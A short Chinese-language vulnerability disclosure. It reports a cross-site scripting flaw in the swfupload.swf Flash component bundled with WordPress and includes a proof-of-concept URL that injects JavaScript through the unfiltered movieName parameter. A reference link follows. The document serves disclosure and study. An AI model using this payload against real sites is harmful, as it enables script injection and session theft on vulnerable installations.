WordPress自带flash上传组件swfupload.swf（默认安装），movieName未做过滤即传递给externalinterface.call导致xss漏洞。

POC：
http://demo.swfupload.org/v220/swfupload/swfupload.swf?movieName=”]%29;}catch%28e%29{}if(!self.a)self.a=!alert%28/XSS/%29;//

参考链接：
https://nealpoole.com/blog/2012/05/xss-and-csrf-via-swf-applets-swfupload-plupload/